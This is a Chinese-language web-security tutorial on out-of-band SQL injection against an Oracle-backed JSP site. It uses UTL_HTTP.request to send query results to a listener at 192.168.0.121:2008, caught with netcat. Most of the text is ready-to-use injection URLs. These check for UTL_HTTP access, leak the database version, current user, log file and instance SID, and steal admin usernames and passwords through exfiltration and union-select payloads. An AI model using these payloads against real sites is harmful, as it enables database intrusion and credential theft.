WEB安全第四章SQL注入篇17oracle+jsp UTL_HTTP.request 反弹注入
通过utl_http.request我们可以将查询的结果发送到远程服务器上,在遇到盲注时非常有用,要使用该方法用户需要有utl_http访问网络的权限。
1、检测是否支持utl_http.request
utl_http.request 页面正常
支持
http://www.jsporcle.com/news.jsp?id=1 and exists (select count(*) from all_objects where object_name=’UTL_HTTP’) —
2、反弹注入命令
http://www.jsporcle.com/news.jsp?id=1 and utl_http.request(‘http://192.168.0.121:2008/’||(select banner from sys.v_$version where rownum=1))=1–
and utl_http.request(‘http://域名或者ip:端口/’||(注入的语句))=1 —
注意|| 注意转码%7C%7C
3、监听本地信息
http://www.jsporcle.com/news.jsp?id=1%20and-
nc -vvlp 2008
4、查询oracle版本信息
%20%20utl_http.request(%27http://192.168.0.121:2008/%27%7C%7C(select%20banner%20from%20sys.v_$version%20where%20rownum=1))=1--
1当前用户 (select user from dual)
2 当前数据库版本 ( select banner from sys.v_$version where rownum=1)
3 服务器出口IP (用utl_http.request 可以实现)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 日志文件 (select member from v$logfile where rownum=1)
6 服务器sid 远程连接的话需要, (select instance_name from v$instance)
7 当前连接用户 (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’)from dual)
查询系统用户
http://www.jsporcle.com/news.jsp?id=1 and%20 utl_http.request('http://192.168.0.121:2008/'%7c%7c (select user from dual))=1--
http://www.jsporcle.com/news.jsp?id=1 and%20 utl_http.request('http://192.168.0.121:2008/'%7c%7c(select member from v$logfile where rownum=1))=1--
http://www.jsporcle.com/news.jsp?id=1%20and%20%20utl_http.request(%27http://192.168.0.121:2008/%27%7c%7c(select%20instance_name%20from%20v$instance))=1-
6、查询admin的帐号和密码
http://www.jsporcle.com/news.jsp?id=1 and utl_http.request('http://192.168.0.121:2008/'%7c%7c(select username%7c%7cpassword from admin))=1 --
http://www.jsporcle.com/news.jsp?id=1%20union%20select%20null,password,username%20from%20admin
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/114
京公网安备 11010802041100号